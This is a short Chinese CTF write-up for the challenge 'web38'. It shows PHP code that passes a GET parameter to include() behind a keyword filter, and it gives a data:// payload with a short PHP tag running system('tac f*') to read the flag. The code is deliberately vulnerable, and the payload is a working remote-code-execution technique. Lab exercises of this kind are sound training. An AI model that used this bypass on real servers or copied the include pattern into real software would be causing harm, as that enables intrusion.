web38笔记(include命令执行+过滤php/file) 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

这⾥把php给过滤了,所以我们换个php的短标签,可以把php换成等号

所以payload ?c=data://text/plain,<?=%20system("tac%20f*");?>

posted @ 2025-03-14 22:46  justdoIT*  阅读(7)  评论(0)    收藏  举报